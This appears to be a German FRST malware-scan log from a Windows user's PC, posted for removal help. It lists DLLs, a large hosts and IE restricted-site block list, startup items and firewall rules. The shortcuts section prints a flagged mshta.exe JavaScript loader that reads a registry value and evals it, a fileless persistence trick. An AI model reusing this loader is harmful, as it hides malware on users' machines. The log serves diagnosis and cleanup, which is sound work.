2016-11-17 17:54 - 2016-11-17 17:54 - 00072192 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.9.261.0_x64__kzf8qxf38zg5c\SkypeHost.exe
2016-11-17 17:54 - 2016-11-17 17:54 - 00178688 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.9.261.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll
2016-11-17 17:54 - 2016-11-17 17:54 - 41609728 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.9.261.0_x64__kzf8qxf38zg5c\SkyWrap.dll
2016-01-03 22:53 - 2014-05-13 12:04 - 00109400 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\snlThirdParty150.bpl
2016-01-03 22:53 - 2014-05-13 12:04 - 00167768 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\snlFileFormats150.bpl
2016-01-03 22:53 - 2014-05-13 12:04 - 00416600 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\DEC150.bpl
2016-01-03 22:53 - 2012-08-23 10:38 - 00574840 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\sqlite3.dll
2016-01-03 22:53 - 2012-04-03 17:06 - 00565640 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\av\BDSmartDB.dll
2015-12-22 22:08 - 2016-10-25 21:21 - 00020536 _____ () C:\Program Files (x86)\NVIDIA Corporation\Update Core\detoured.dll
2016-09-24 16:48 - 2016-10-25 20:57 - 00506424 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvSpCapsAPINode.node
2016-09-24 16:48 - 2016-10-25 20:57 - 00255936 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\DriverInstall.node
2016-09-24 16:48 - 2016-10-25 20:57 - 02808256 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\Downloader.node
2016-09-24 16:48 - 2016-10-25 21:21 - 00901688 _____ () C:\Program Files (x86)\NVIDIA Corporation\NvContainer\libprotobuf.dll
2016-09-24 16:48 - 2016-10-25 21:21 - 03776056 _____ () C:\Program Files (x86)\NVIDIA Corporation\NvContainer\Poco.dll
2016-09-24 16:48 - 2016-10-25 20:57 - 00246840 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvGameShareAPINode.node
2016-09-24 16:48 - 2016-10-25 20:57 - 00436792 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvGalleryAPINode.node
2016-09-24 16:48 - 2016-10-25 20:57 - 00338488 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVAccountAPINode.node
2016-09-24 16:48 - 2016-10-25 20:57 - 00968248 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvCameraAPINode.node
2016-12-02 23:06 - 2016-12-02 23:06 - 01309184 _____ () C:\Users\Patrick\AppData\Local\Idhsoft\sbdzoqlr.dll
2016-09-24 16:38 - 2016-09-24 16:38 - 00679624 _____ () C:\Users\Patrick\AppData\Local\Microsoft\OneDrive\17.3.6390.0509\ClientTelemetry.dll
2014-05-01 15:15 - 2016-11-22 17:47 - 00564736 _____ () C:\Users\Patrick\AppData\Local\MEGAsync\ShellExtX32.dll
2016-09-30 15:58 - 2014-05-19 18:10 - 00028160 _____ () C:\Program Files (x86)\UtechSmart 16400DPI VENUS Gaming Mouse\uiHook.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)


==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)


==================== Verknüpfungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)

HKU\.DEFAULT\Software\Classes\b2d5561b: "C:\WINDOWS\system32\mshta.exe" "javascript:aHB3O2vQe="XIaCPq";K8F7=new ActiveXObject("WScript.Shell");kb2HViTu="lD";oBT1i=K8F7.RegRead("HKCU\\software\\gutzosf\\ovbiorejov");h3RuhK="rutN";eval(oBT1i);sOCGM25="Sh8U";" <===== ACHTUNG

==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)

IE restricted site: HKU\.DEFAULT\...\007guard.com -> install.007guard.com
IE restricted site: HKU\.DEFAULT\...\008i.com -> 008i.com
IE restricted site: HKU\.DEFAULT\...\008k.com -> www.008k.com
IE restricted site: HKU\.DEFAULT\...\00hq.com -> www.00hq.com
IE restricted site: HKU\.DEFAULT\...\010402.com -> 010402.com
IE restricted site: HKU\.DEFAULT\...\032439.com -> 80gw6ry3i3x3qbrkwhxhw.032439.com
IE restricted site: HKU\.DEFAULT\...\0scan.com -> www.0scan.com
IE restricted site: HKU\.DEFAULT\...\1-2005-search.com -> www.1-2005-search.com
IE restricted site: HKU\.DEFAULT\...\1-domains-registrations.com -> www.1-domains-registrations.com
IE restricted site: HKU\.DEFAULT\...\1000gratisproben.com -> www.1000gratisproben.com
IE restricted site: HKU\.DEFAULT\...\1001namen.com -> www.1001namen.com
IE restricted site: HKU\.DEFAULT\...\100888290cs.com -> mir.100888290cs.com
IE restricted site: HKU\.DEFAULT\...\100sexlinks.com -> www.100sexlinks.com
IE restricted site: HKU\.DEFAULT\...\10sek.com -> www.10sek.com
IE restricted site: HKU\.DEFAULT\...\12-26.net -> user1.12-26.net
IE restricted site: HKU\.DEFAULT\...\12-27.net -> user1.12-27.net
IE restricted site: HKU\.DEFAULT\...\123fporn.info -> www.123fporn.info
IE restricted site: HKU\.DEFAULT\...\123haustiereundmehr.com -> www.123haustiereundmehr.com
IE restricted site: HKU\.DEFAULT\...\123moviedownload.com -> www.123moviedownload.com
IE restricted site: HKU\.DEFAULT\...\123simsen.com -> www.123simsen.com

Da befinden sich 7916 mehr Seiten.

IE trusted site: HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\cfca.com.cn -> hxxp://cfca.com.cn
IE trusted site: HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\cfca.com.cn -> hxxps://cfca.com.cn
IE trusted site: HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\hola.org -> hxxp://hola.org
IE trusted site: HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\hxb.com.cn -> hxxps://dbank.hxb.com.cn
IE restricted site: HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\007guard.com -> install.007guard.com
IE restricted site: HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\008i.com -> 008i.com
IE restricted site: HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\008k.com -> www.008k.com
IE restricted site: HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\00hq.com -> www.00hq.com
IE restricted site: HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\010402.com -> 010402.com
IE restricted site: HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\032439.com -> 80gw6ry3i3x3qbrkwhxhw.032439.com
IE restricted site: HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\0scan.com -> www.0scan.com
IE restricted site: HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\1-2005-search.com -> www.1-2005-search.com
IE restricted site: HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\1-domains-registrations.com -> www.1-domains-registrations.com
IE restricted site: HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\1000gratisproben.com -> www.1000gratisproben.com
IE restricted site: HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\1001namen.com -> www.1001namen.com
IE restricted site: HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\100888290cs.com -> mir.100888290cs.com
IE restricted site: HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\100sexlinks.com -> www.100sexlinks.com
IE restricted site: HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\10sek.com -> www.10sek.com
IE restricted site: HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\12-26.net -> user1.12-26.net
IE restricted site: HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\12-27.net -> user1.12-27.net
IE restricted site: HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\123fporn.info -> www.123fporn.info
IE restricted site: HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\123haustiereundmehr.com -> www.123haustiereundmehr.com
IE restricted site: HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\123moviedownload.com -> www.123moviedownload.com
IE restricted site: HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\123simsen.com -> www.123simsen.com

Da befinden sich 7917 mehr Seiten.


==================== Hosts Inhalt: ==========================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2015-10-30 08:24 - 2016-11-28 20:20 - 00453482 ____R C:\WINDOWS\system32\Drivers\etc\hosts

127.0.0.1        www.007guard.com
127.0.0.1        007guard.com
127.0.0.1        008i.com
127.0.0.1        www.008k.com
127.0.0.1        008k.com
127.0.0.1        www.00hq.com
127.0.0.1        00hq.com
127.0.0.1        010402.com
127.0.0.1        www.032439.com
127.0.0.1        032439.com
127.0.0.1        www.0scan.com
127.0.0.1        0scan.com
127.0.0.1        1000gratisproben.com
127.0.0.1        www.1000gratisproben.com
127.0.0.1        1001namen.com
127.0.0.1        www.1001namen.com
127.0.0.1        100888290cs.com
127.0.0.1        www.100888290cs.com
127.0.0.1        www.100sexlinks.com
127.0.0.1        100sexlinks.com
127.0.0.1        10sek.com
127.0.0.1        www.10sek.com
127.0.0.1        www.1-2005-search.com
127.0.0.1        1-2005-search.com
127.0.0.1        123fporn.info
127.0.0.1        www.123fporn.info
127.0.0.1        123haustiereundmehr.com
127.0.0.1        www.123haustiereundmehr.com
127.0.0.1        123moviedownload.com
127.0.0.1        www.123moviedownload.com

Da befinden sich 15559 zusätzliche Einträge.


==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Patrick\Pictures\fire-and-ice-dragon.jpg
DNS Servers: 192.168.178.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

HKLM\...\StartupApproved\Run32: => "PDFPrint"
HKLM\...\StartupApproved\Run32: => "ProductUpdater"
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\StartupApproved\StartupFolder: => "MEGAsync.lnk"
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\StartupApproved\Run: => "OneDrive"
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\StartupApproved\Run: => "DAEMON Tools Lite Automount"
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\StartupApproved\Run: => "Steam"
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\StartupApproved\Run: => "CCleaner Monitoring"
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\StartupApproved\Run: => "Chromium"
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\StartupApproved\Run: => "CimatronE12.0_x64"

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [vm-monitoring-nb-session] => LPort=139
FirewallRules: [{3764DFD5-D417-45BC-90EB-D1310FCD24EF}] => C:\Program Files (x86)\Steam\steamapps\common\Good Robot\GoodRobot.exe
FirewallRules: [{7381C9DF-2994-420A-936D-26C12C32B21B}] => C:\Program Files (x86)\Steam\steamapps\common\Good Robot\GoodRobot.exe
FirewallRules: [{31375AFE-B469-4D14-9EEB-59902F581197}] => C:\Program Files (x86)\Steam\steamapps\common\Roguelands\Roguelands.exe
FirewallRules: [{FAFFFCA4-97CB-461B-8446-3014E8140DF7}] => C:\Program Files (x86)\Steam\steamapps\common\Roguelands\Roguelands.exe
FirewallRules: [{0A714477-C01F-46CF-9572-729D2CDE5F82}] => C:\Program Files (x86)\Steam\steamapps\common\Void Raiders\VoidRaiders.exe
FirewallRules: [{CB119EB7-91C7-4F18-8552-76550D760525}] => C:\Program Files (x86)\Steam\steamapps\common\Void Raiders\VoidRaiders.exe
FirewallRules: [{D99C49B5-19C6-4FF8-B402-B71DE35D53C3}] => C:\Program Files (x86)\Steam\steamapps\common\Magicians and Looters\mal.exe
FirewallRules: [{BF7BC0FD-0B8B-486B-81C3-B78A6461F5B8}] => C:\Program Files (x86)\Steam\steamapps\common\Magicians and Looters\mal.exe
FirewallRules: [{ECC4B7A7-C3D2-488F-AF32-5FDAA6F14A5F}] => C:\Program Files (x86)\Steam\steamapps\common\mercenary_kings\MercenaryKings.exe
FirewallRules: [{CE89D393-83CA-4ADE-B55E-A5E6E654C0E5}] => C:\Program Files (x86)\Steam\steamapps\common\mercenary_kings\MercenaryKings.exe
FirewallRules: [{5CB1B11D-828A-48DD-A485-4C46C23E100C}] => C:\Program Files (x86)\Steam\steamapps\common\Witch & Hero(魔女と勇者)\witchandhero.exe
FirewallRules: [{6B36CFB6-0E38-459A-8270-E8FA8BA7791F}] => C:\Program Files (x86)\Steam\steamapps\common\Witch & Hero(魔女と勇者)\witchandhero.exe
FirewallRules: [{D72E2045-C71C-439D-933C-81AB4CEA7436}] => C:\Program Files (x86)\Steam\steamapps\common\ParanauticalActivity\Paranautical Activity.exe
FirewallRules: [{5E430C19-EC7A-447E-BB1E-8356D31244D5}] => C:\Program Files (x86)\Steam\steamapps\common\ParanauticalActivity\Paranautical Activity.exe
FirewallRules: [{471B154F-9907-4E2E-AF7F-F39B056C0EF9}] => C:\Program Files (x86)\Steam\steamapps\common\Princess.Loot.Pixel.Again\game.exe
FirewallRules: [{6EE0233A-1022-4D51-9A06-064B0DA60368}] => C:\Program Files (x86)\Steam\steamapps\common\Princess.Loot.Pixel.Again\game.exe
FirewallRules: [{18F2A80B-8F84-4F20-88A7-2457F51A80A7}] => C:\Program Files (x86)\Steam\steamapps\common\PAC-MAN Championship Edition DX+\PAC-MAN.exe
FirewallRules: [{44D74E01-714E-4680-A1B3-BEF85F2DD33F}] => C:\Program Files (x86)\Steam\steamapps\common\PAC-MAN Championship Edition DX+\PAC-MAN.exe
FirewallRules: [{08E5FE0A-8B11-4B74-A9D7-B29E23B2FC52}] => C:\Program Files (x86)\Steam\steamapps\common\DLC Quest\DLC.exe
FirewallRules: [{85A8FD2F-DD8B-493B-AE96-254566510C00}] => C:\Program Files (x86)\Steam\steamapps\common\DLC Quest\DLC.exe
FirewallRules: [UDP Query User{29E3EEAD-2962-4CAC-A152-00CA7C21188F}C:\program files\sogouinput\7.9.0.7504\sgdownload.exe] => C:\program files\sogouinput\7.9.0.7504\sgdownload.exe
FirewallRules: [TCP Query User{B27B8D37-B155-4C7A-9047-23216E25A07F}C:\program files\sogouinput\7.9.0.7504\sgdownload.exe] => C:\program files\sogouinput\7.9.0.7504\sgdownload.exe
FirewallRules: [{2CAA031F-EB05-48E0-965D-5537212A10F5}] => C:\Program Files (x86)\Steam\steamapps\common\CrossCode\crosscode-beta.exe
FirewallRules: [{D972B89E-FEE6-4681-9A5E-9AA8C101C4A0}] => C:\Program Files (x86)\Steam\steamapps\common\CrossCode\crosscode-beta.exe
FirewallRules: [{9AC3B67F-9362-4A04-8FDB-6AE5E92703F7}] => C:\Program Files (x86)\Steam\steamapps\common\Neptunia Rebirth1\NeptuniaReBirth1.exe
FirewallRules: [{F8B6C5CE-8322-498D-8C32-AA0C5F2E13DA}] => C:\Program Files (x86)\Steam\steamapps\common\Neptunia Rebirth1\NeptuniaReBirth1.exe
FirewallRules: [{235DD586-F3B8-45EE-957B-F6603EB1AB2F}] => C:\Program Files (x86)\Steam\steamapps\common\Hammerwatch\editor\HammerEditor.exe
FirewallRules: [{718C3044-F348-4F71-82E5-0C9F35DBEA8E}] => C:\Program Files (x86)\Steam\steamapps\common\Hammerwatch\editor\HammerEditor.exe
FirewallRules: [{20FE32C5-D219-4078-A8F6-82F8AC0ED03E}] => C:\Program Files (x86)\Steam\steamapps\common\Hammerwatch\Hammerwatch.exe
FirewallRules: [{BFB4F770-4B63-42CC-A179-20AF6BDAF310}] => C:\Program Files (x86)\Steam\steamapps\common\Hammerwatch\Hammerwatch.exe
FirewallRules: [{B055C440-C4A6-4B6E-984F-FE64611637AF}] => C:\Program Files (x86)\Steam\steamapps\common\Ghost\ghost.exe
FirewallRules: [{F1C2D9E1-F78C-4258-B7C8-B42A2F73C73F}] => C:\Program Files (x86)\Steam\steamapps\common\Ghost\ghost.exe
FirewallRules: [UDP Query User{DEA51591-39A9-416D-9210-5BCF02DAD2AE}C:\users\patrick\appdata\local\apps\2.0\q810qyjk.aoq\pzx0azte.zo5\kong..tion_0000000000000000_0000.0001_ae491a2415382a1a\konghacktrainer.exe] => C:\users\patrick\appdata\local\apps\2.0\q810qyjk.aoq\pzx0azte.zo5\kong..tion_0000000000000000_0000.0001_ae491a2415382a1a\konghacktrainer.exe
FirewallRules: [TCP Query User{A6523082-5CA8-4EB2-8CE0-87C5AF05722C}C:\users\patrick\appdata\local\apps\2.0\q810qyjk.aoq\pzx0azte.zo5\kong..tion_0000000000000000_0000.0001_ae491a2415382a1a\konghacktrainer.exe] => C:\users\patrick\appdata\local\apps\2.0\q810qyjk.aoq\pzx0azte.zo5\kong..tion_0000000000000000_0000.0001_ae491a2415382a1a\konghacktrainer.exe
FirewallRules: [{46E4056F-38C3-43D2-9873-0F5CB6657BF5}] => C:\Games\Tor Browser\Browser\TorBrowser\Tor\PluggableTransports\fteproxy.exe
FirewallRules: [{EBE7F259-D304-44EE-BAA9-978AA436B65B}] => C:\Games\Tor Browser\Browser\TorBrowser\Tor\PluggableTransports\fteproxy.exe
FirewallRules: [{84A087DB-1030-43E6-890A-F3B223671A2F}] => C:\Games\Tor Browser\Browser\TorBrowser\Tor\PluggableTransports\fteproxy.exe
FirewallRules: [{6F780622-0622-4A0F-9FC6-AE324B1C070F}] => C:\Games\Tor Browser\Browser\TorBrowser\Tor\PluggableTransports\fteproxy.exe
FirewallRules: [{FA096091-49D3-4609-B2E4-22181FCB60C3}] => C:\Games\Tor Browser\Browser\TorBrowser\Tor\tor.exe
FirewallRules: [{DD808A59-21DA-4D23-B121-C84B6E6627E6}] => C:\Games\Tor Browser\Browser\TorBrowser\Tor\tor.exe
FirewallRules: [{BE3B029E-9D26-40AE-BFB4-EEBF356BA885}] => C:\Games\Tor Browser\Browser\TorBrowser\Tor\tor.exe
FirewallRules: [{616D7593-4379-4910-BC48-4B8F5C9C15C8}] => C:\Games\Tor Browser\Browser\TorBrowser\Tor\tor.exe
FirewallRules: [{05123FE3-F069-4B52-9593-4990020FE03E}] => C:\Games\Tor Browser\Browser\firefox.exe
FirewallRules: [{2448D1F8-D212-403E-BCD8-A658EB6999A0}] => C:\Games\Tor Browser\Browser\firefox.exe
FirewallRules: [{534F5062-92B5-4421-99A3-1565B99AC49D}] => C:\Games\Tor Browser\Browser\firefox.exe
FirewallRules: [{D920F5B3-9429-468B-8A68-FD7F9B729D79}] => C:\Games\Tor Browser\Browser\firefox.exe
FirewallRules: [{8F6367D0-CE2C-41EB-A9BA-4F1DAEFFBF45}] => C:\Program Files (x86)\Steam\steamapps\common\Saints Row IV\SaintsRowIV.exe
FirewallRules: [{DBD9FB03-B8F1-42AF-9A7A-D7F8FB0CC69E}] => C:\Program Files (x86)\Steam\steamapps\common\Saints Row IV\SaintsRowIV.exe
FirewallRules: [{AF9589E2-158D-4C95-BFC9-65BBDD91A19E}] => C:\Program Files (x86)\Steam\steamapps\common\HeroSiege\bin\Hero_Siege.exe
FirewallRules: [{D5FDCF37-4154-4093-9117-8BD419465C73}] => C:\Program Files (x86)\Steam\steamapps\common\HeroSiege\bin\Hero_Siege.exe
FirewallRules: [{EC2ABB68-B46C-425A-83F7-CDA9F68FB7FF}] => C:\Program Files (x86)\Steam\steamapps\common\HyperLightDrifter\HyperLightDrifter.exe
FirewallRules: [{D500DC79-5ADA-412D-B382-9601912F2550}] => C:\Program Files (x86)\Steam\steamapps\common\HyperLightDrifter\HyperLightDrifter.exe
FirewallRules: [{251828C1-0ECC-440D-803A-75DB68A1B8C5}] => C:\Program Files (x86)\Steam\steamapps\common\Saints Row the Third\SaintsRowTheThird_DX11.exe
FirewallRules: [{7AF92E39-A085-4E65-BFA6-EBEA938287B1}] => C:\Program Files (x86)\Steam\steamapps\common\Saints Row the Third\SaintsRowTheThird_DX11.exe
FirewallRules: [{31833F03-49C6-46F5-8DB6-93FAD4067DEF}] => C:\Program Files (x86)\Steam\steamapps\common\Saints Row the Third\SaintsRowTheThird.exe
FirewallRules: [{64A06AB9-50A5-4013-AFB4-60B42114BC16}] => C:\Program Files (x86)\Steam\steamapps\common\Saints Row the Third\SaintsRowTheThird.exe
FirewallRules: [{3C2711C5-9087-49A9-BE22-DCB24B3882E6}] => C:\Program Files (x86)\Steam\steamapps\common\Saints Row the Third\game_launcher.exe
FirewallRules: [{0E57CF92-59D7-4676-ACD5-D550E0D60D7C}] => C:\Program Files (x86)\Steam\steamapps\common\Saints Row the Third\game_launcher.exe
FirewallRules: [{23D7BBAB-6A17-48FA-991E-14C6A19B3E6D}] => C:\Program Files\Vuze\Azureus.exe
FirewallRules: [{AC851ED3-7362-456E-AE70-1D5CEFE7C89D}] => C:\Program Files\Vuze\Azureus.exe
FirewallRules: [UDP Query User{95963643-843A-4C3F-8990-57834844732B}C:\program files (x86)\tencent\qqintl\bin\qq.exe] => C:\program files (x86)\tencent\qqintl\bin\qq.exe
FirewallRules: [TCP Query User{ABB12612-9084-4064-9CC6-6BF1C99BFAA6}C:\program files (x86)\tencent\qqintl\bin\qq.exe] => C:\program files (x86)\tencent\qqintl\bin\qq.exe
FirewallRules: [{D6C353DC-6121-487D-966E-479BEE4C83C3}] => C:\Program Files\KeyShot5\bin\keyshot_daemon.exe
FirewallRules: [{92B2A13C-CECB-422E-8932-B5B8B67F8948}] => C:\Program Files\KeyShot5\bin\keyshot5.exe
FirewallRules: [{C01D116D-EFC4-4CE6-8AEC-E832D50650C1}] => C:\Program Files\Vuze\jre\bin\javaw.exe
FirewallRules: [{873C240A-601E-4C96-A4DD-7CECC158AED4}] => C:\Program Files\Vuze\jre\bin\javaw.exe
FirewallRules: [{FE2110F3-E125-46AF-985A-696EC1C64382}] => C:\Program Files\Vuze\jre\bin\javaw.exe
FirewallRules: [{AF85E0AE-2101-4EF1-8103-A5D494C5BA85}] => C:\Program Files\Vuze\jre\bin\javaw.exe
FirewallRules: [{BD71D367-6727-4A6C-8214-0E1B4CDD0370}] => C:\Program Files (x86)\Steam\steamapps\common\Ziggurat\Ziggurat.exe
FirewallRules: [{EF176D09-0714-4693-B01A-2F882FA6383E}] => C:\Program Files (x86)\Steam\steamapps\common\Ziggurat\Ziggurat.exe
FirewallRules: [{09F993A2-1C2A-417F-8E24-6A766640D8CD}] => C:\Program Files (x86)\Steam\steamapps\common\Iron Fisticle\IronFisticle.exe
FirewallRules: [{1399F122-9A16-4B47-BDF9-8FFF9B2AC1F6}] => C:\Program Files (x86)\Steam\steamapps\common\Iron Fisticle\IronFisticle.exe
FirewallRules: [{29922ED6-8987-4CD1-B01F-69A16DAABA3B}] => C:\Program Files (x86)\Steam\steamapps\common\Risk of Rain\Risk of Rain.exe
FirewallRules: [{6F033B50-F83E-4C8E-8FB8-8124CE0A9B51}] => C:\Program Files (x86)\Steam\steamapps\common\Risk of Rain\Risk of Rain.exe
FirewallRules: [{6DCB7751-498F-4F8F-AA4D-5470F22CF767}] => C:\Program Files (x86)\Steam\steamapps\common\Dungeon Souls\DungeonSouls.exe
FirewallRules: [{1815A6A8-AB69-405B-A4F0-FE2E0DF40E5F}] => C:\Program Files (x86)\Steam\steamapps\common\Dungeon Souls\DungeonSouls.exe
FirewallRules: [{60AC0683-DF68-4FCB-AB90-9B04AEFFBDCC}] => C:\Program Files (x86)\Steam\steamapps\common\Deathstate\Deathstate.exe
FirewallRules: [{E30B989C-7D43-4738-BB72-D755DD0C0035}] => C:\Program Files (x86)\Steam\steamapps\common\Deathstate\Deathstate.exe
FirewallRules: [{6F921651-3A24-4904-B3F8-43F2E513FAD3}] => C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{988081A4-F5C0-4042-8CEC-F4659DF3F10E}] => C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{EBAC9118-80CB-497F-A151-7752BAEDDA40}] => C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{75ABB2FF-A053-4650-A535-8817F3BE8850}] => C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{7CCBD6F6-8101-4382-9511-88A9B3673ADF}] => C:\Program Files (x86)\Common Files\Tencent\QQDownload\119\Tencentdl.exe
FirewallRules: [{C6943B46-F017-4E8C-9B3B-10655C08EA16}] => C:\Program Files (x86)\Common Files\Tencent\QQDownload\119\Tencentdl.exe
FirewallRules: [{70128B16-2126-4D5C-AB34-598B205A837F}] => C:\Program Files (x86)\Tencent\QQIntl\Bin\QQ.exe
FirewallRules: [{B78BCA76-ADDD-4E79-A1D5-A0E62B84EC11}] => C:\Program Files (x86)\Tencent\QQIntl\Bin\QQ.exe
FirewallRules: [{FAED5051-98F2-4FB7-B3CC-0DC1859D2AB2}] => C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{650F7EAC-66E2-4705-811A-4786F8186D3F}] => C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{F8DF8682-9EC4-461B-A83C-7137D354D3D7}] => C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
FirewallRules: [{EF61B266-6E00-457B-98D9-2882EE3E1E4D}] => C:\Program Files\NVIDIA Corporation\NvContainer\NvContainer.exe
FirewallRules: [{E3A67D95-B6EF-455E-B3FB-5BAD99F65F70}] => C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{D9967287-87A3-41DD-8E42-DD2461004836}] => C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{86CE6FBC-9E00-484C-834A-A85F1A89840F}] => C:\Users\Patrick\AppData\Local\Yandex\YandexBrowser\Application\browser.exe
FirewallRules: [{7EA154DD-3142-47C5-92B9-86651E5C7CB4}] => C:\Program Files\SogouInput\8.1.0.8411\SGTool.exe
FirewallRules: [{D9133A72-07FB-4436-99F4-D7C4E86DF477}] => C:\Program Files\SogouInput\8.1.0.8411\SGTool.exe
FirewallRules: [{72774E9B-97BF-4D9E-A3F3-31745482D0C5}] => C:\Program Files\SogouInput\8.1.0.8411\SGTool.exe
FirewallRules: [{0F24359D-B5D1-4E4B-A2A3-8311694C6701}] => C:\Program Files\SogouInput\8.1.0.8411\SGTool.exe
FirewallRules: [{01775F07-2831-4DD4-B754-C8A0385E099B}] => C:\Program Files\SogouInput\8.1.0.8411\SGTool.exe
FirewallRules: [{5B86419F-A53E-40B9-B14F-168B089683DA}] => C:\Program Files\SogouInput\8.1.0.8411\SGTool.exe
FirewallRules: [{7FDB2EB3-9F97-4E66-A7E1-9EDA750A5556}] => C:\Program Files\SogouInput\8.1.0.8411\PinyinUp.exe
FirewallRules: [{5C7661D4-9409-48A3-A224-10BFDE64CA64}] => C:\Program Files\SogouInput\8.1.0.8411\PinyinUp.exe
FirewallRules: [{54CB7C35-71E8-4144-B31C-7CB892EDF390}] => C:\Program Files\SogouInput\8.1.0.8411\PinyinUp.exe
FirewallRules: [{4292ABB5-3849-466E-8968-7B8C885792D3}] => C:\Program Files\SogouInput\8.1.0.8411\PinyinUp.exe
FirewallRules: [{DC6F0713-9B09-4658-9A58-DA3475F25AA6}] => C:\Program Files\SogouInput\8.1.0.8411\PinyinUp.exe
FirewallRules: [{D7C6184B-D3E0-4930-B7E3-66EBE0FA5A1D}] => C:\Program Files\SogouInput\8.1.0.8411\PinyinUp.exe
FirewallRules: [{3129E8F9-898F-4D3B-B6F0-8C8BB4878F38}] => C:\Program Files\SogouInput\8.1.0.8411\SGDownload.exe
FirewallRules: [{09855C59-7B31-433B-9F51-1E0F50729A08}] => C:\Program Files\SogouInput\8.1.0.8411\SGDownload.exe
FirewallRules: [{7E578D3A-18A5-421E-978D-1B311DF77447}] => C:\Program Files\SogouInput\8.1.0.8411\SGDownload.exe
FirewallRules: [{18857925-C99F-4497-91ED-34E71F1A9B8B}] => C:\Program Files\SogouInput\8.1.0.8411\SGDownload.exe
FirewallRules: [{D4B2A7D4-91F7-41AE-B759-70B4372F5502}] => C:\Program Files\SogouInput\8.1.0.8411\SGDownload.exe
FirewallRules: [{460F737E-9EC0-4BC7-8F56-40340E87EC0C}] => C:\Program Files\SogouInput\8.1.0.8411\SGDownload.exe
FirewallRules: [{44531322-CDE2-4E6F-84F8-E93757A14AE3}] => C:\Program Files\SogouInput\8.1.0.8411\SogouCloud.exe
FirewallRules: [{2D760737-7C7F-48B2-9F32-094B47DBD9D4}] => C:\Program Files\SogouInput\8.1.0.8411\SogouCloud.exe
